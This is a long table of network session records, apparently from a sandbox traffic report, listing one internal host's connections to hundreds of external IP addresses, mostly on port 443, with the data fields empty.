                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11542192.168.2.143413492.251.109.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11543192.168.2.145414044.0.204.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11544192.168.2.1440400187.30.39.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11545192.168.2.1456234175.71.253.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11546192.168.2.145856284.179.91.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11547192.168.2.1438266202.26.93.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11548192.168.2.1442112153.35.51.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11549192.168.2.1437286201.122.197.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11550192.168.2.1432864116.84.1.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11551192.168.2.145130489.166.99.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11552192.168.2.1450490174.14.148.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11553192.168.2.144909619.45.155.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11554192.168.2.1434812191.142.5.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11555192.168.2.1440814204.102.8.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11556192.168.2.143943280.23.1.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11557192.168.2.145033064.73.167.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11558192.168.2.144798658.90.63.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11559192.168.2.145419657.107.57.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11560192.168.2.1451512199.194.235.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11561192.168.2.1457794110.141.68.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11562192.168.2.145803445.185.1.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11563192.168.2.1433292142.189.229.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11564192.168.2.145099266.1.233.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11565192.168.2.143814653.15.169.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11566192.168.2.144285699.150.201.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11567192.168.2.1454594210.113.42.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11568192.168.2.1437516114.242.95.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11569192.168.2.144792486.218.188.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11570192.168.2.1458424197.79.91.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11571192.168.2.1455696134.88.196.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11572192.168.2.145918680.123.21.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11573192.168.2.143618812.176.63.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11574192.168.2.145264277.165.186.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11575192.168.2.1452854170.178.63.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11576192.168.2.1456090213.96.195.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11577192.168.2.1443018194.214.211.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11578192.168.2.1446104125.118.234.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11579192.168.2.143509686.24.73.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11580192.168.2.1452640197.84.172.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11581192.168.2.1435884201.134.71.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11582192.168.2.1433758177.104.125.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11583192.168.2.1435174207.99.160.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11584192.168.2.143303693.75.193.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11585192.168.2.145706271.130.123.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11586192.168.2.144404496.65.86.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11587192.168.2.1455930196.166.177.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11588192.168.2.1450720190.147.74.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11589192.168.2.14538642.44.211.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11590192.168.2.1451106102.22.152.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11591192.168.2.1435562152.197.116.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11592192.168.2.143320641.252.250.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11593192.168.2.1458602110.23.68.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11594192.168.2.145578657.204.219.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11595192.168.2.1434984106.254.233.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11596192.168.2.1457788143.131.26.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11597192.168.2.145094667.144.213.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11598192.168.2.1440312205.43.16.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11599192.168.2.1456008140.170.225.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11600192.168.2.1458430124.168.193.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11601192.168.2.1454332216.53.119.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11602192.168.2.144111094.85.221.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11603192.168.2.1439182180.236.226.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11604192.168.2.1460390197.154.31.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11605192.168.2.14524481.16.14.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11606192.168.2.1437816184.175.64.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11607192.168.2.143489880.225.22.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11608192.168.2.1446528153.168.181.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11609192.168.2.145436637.91.125.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11610192.168.2.144713814.225.77.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11611192.168.2.1443856186.209.114.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11612192.168.2.1436418132.184.139.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11613192.168.2.145693836.45.169.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11614192.168.2.1452804209.144.83.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11615192.168.2.1459620122.216.1.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11616192.168.2.144545027.5.43.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11617192.168.2.144520473.106.217.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11618192.168.2.1450374222.163.198.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11619192.168.2.1452954108.181.103.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11620192.168.2.1441532199.128.114.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11621192.168.2.1458028162.40.173.2378080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11622192.168.2.144554852.58.208.888080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11623192.168.2.145924064.75.129.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11624192.168.2.1445734150.38.168.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11625192.168.2.144104854.95.198.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11626192.168.2.1452630159.242.178.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11627192.168.2.143948451.37.16.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11628192.168.2.1440626131.224.223.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11629192.168.2.145646658.43.77.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11630192.168.2.143898653.208.171.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11631192.168.2.1457060108.27.58.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11632192.168.2.145985639.147.86.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11633192.168.2.144192697.4.240.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11634192.168.2.143758837.32.223.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11635192.168.2.143650669.50.153.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11636192.168.2.143778242.95.39.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11637192.168.2.144344425.59.242.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11638192.168.2.1434526156.38.115.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11639192.168.2.145818086.252.238.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11640192.168.2.143993073.147.109.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11641192.168.2.1447938170.190.24.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11642192.168.2.1441564122.154.249.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11643192.168.2.1434242216.171.180.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11644192.168.2.145035078.181.3.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11645192.168.2.1439574110.218.157.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11646192.168.2.144536037.141.102.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11647192.168.2.144507266.20.74.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11648192.168.2.1436840222.57.63.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11649192.168.2.1436732123.110.86.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11650192.168.2.1459454202.193.118.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11651192.168.2.1450714171.48.116.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11652192.168.2.1439958181.245.74.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11653192.168.2.144394486.158.43.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11654192.168.2.143636082.22.196.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11655192.168.2.1440250178.145.46.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11656192.168.2.144223027.160.171.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11657192.168.2.1449030126.47.182.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11658192.168.2.1454908184.228.223.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11659192.168.2.1434086118.110.137.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11660192.168.2.144553294.142.54.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11661192.168.2.1446254166.219.65.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11662192.168.2.1448210143.19.88.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11663192.168.2.1446392210.139.102.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11664192.168.2.145990076.210.50.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11665192.168.2.144898286.0.241.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11666192.168.2.1447794143.95.221.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11667192.168.2.145996865.163.200.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11668192.168.2.144106050.145.159.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11669192.168.2.1437622167.27.168.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11670192.168.2.1456254187.212.186.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11671192.168.2.14478361.124.196.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11672192.168.2.1443808211.240.216.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11673192.168.2.145351444.193.77.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11674192.168.2.143479685.30.12.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11675192.168.2.145645825.144.38.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11676192.168.2.1433328210.109.251.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11677192.168.2.1445450111.99.71.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11678192.168.2.1460942204.11.71.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11679192.168.2.145776280.24.31.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11680192.168.2.14329761.242.45.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11681192.168.2.143312897.84.111.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11682192.168.2.1459706145.86.229.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11683192.168.2.1440838151.21.17.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11684192.168.2.144923842.120.21.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11685192.168.2.145042014.114.231.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11686192.168.2.1453994181.215.5.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11687192.168.2.1445286202.74.42.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11688192.168.2.145925283.57.27.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11689192.168.2.144888674.243.91.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11690192.168.2.1448962124.119.208.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11691192.168.2.1436084153.193.64.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11692192.168.2.1444760210.135.178.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11693192.168.2.1449870124.86.119.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11694192.168.2.1439530172.197.231.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11695192.168.2.1437652125.11.153.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11696192.168.2.144196288.134.58.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11697192.168.2.1454620145.110.95.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11698192.168.2.1452588191.101.209.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11699192.168.2.1444174216.237.96.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11700192.168.2.1455372208.56.166.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11701192.168.2.1455104116.200.8.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11702192.168.2.1436120108.37.3.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11703192.168.2.1458916159.148.115.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11704192.168.2.1460116119.27.23.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11705192.168.2.1450178213.137.112.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11706192.168.2.145293835.113.202.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11707192.168.2.145062490.18.216.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11708192.168.2.1437764181.134.189.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11709192.168.2.144652041.225.33.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11710192.168.2.1434358154.158.87.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11711192.168.2.1437606219.236.230.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11712192.168.2.1450710210.209.227.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11713192.168.2.1445608164.243.152.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11714192.168.2.1443798212.244.118.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11715192.168.2.145040266.89.225.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11716192.168.2.1443614134.255.13.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11717192.168.2.1437198142.22.149.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11718192.168.2.1440676128.0.151.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11719192.168.2.1453104110.54.36.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11720192.168.2.1438058172.57.134.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11721192.168.2.1443158185.63.112.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11722192.168.2.1442644210.178.41.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11723192.168.2.1433344119.31.107.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11724192.168.2.1454070171.75.19.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11725192.168.2.145997259.165.83.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11726192.168.2.143349644.15.119.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11727192.168.2.1437050216.46.10.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11728192.168.2.1451112121.194.106.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11729192.168.2.1445230158.36.130.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11730192.168.2.144229290.73.192.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11731192.168.2.1452076126.72.172.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11732192.168.2.14520201.199.43.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11733192.168.2.14568648.188.64.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11734192.168.2.145415653.249.6.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11735192.168.2.143917846.123.54.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11736192.168.2.143565099.60.83.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11737192.168.2.1449822205.95.235.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11738192.168.2.143780051.148.69.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11739192.168.2.143763434.189.179.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11740192.168.2.1458372190.99.97.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11741192.168.2.144042659.186.183.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11742192.168.2.144253683.247.40.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11743192.168.2.14513842.181.87.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11744192.168.2.1436256156.164.8.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11745192.168.2.143698272.2.80.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11746192.168.2.144428017.0.108.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11747192.168.2.1458828120.158.200.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11748192.168.2.1434642139.231.60.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11749192.168.2.144877013.175.108.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11750192.168.2.145006038.210.36.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11751192.168.2.143777492.95.176.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11752192.168.2.1434148134.115.63.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11753192.168.2.1452374173.177.177.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11754192.168.2.1454432166.90.209.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11755192.168.2.1450368101.10.139.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11756192.168.2.143886219.33.14.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11757192.168.2.1435304164.251.215.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11758192.168.2.1447174150.7.234.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11759192.168.2.1444318186.146.149.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11760192.168.2.1449258166.9.212.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11761192.168.2.144260052.1.135.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11762192.168.2.1435968191.222.152.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11763192.168.2.1444270180.200.43.79443
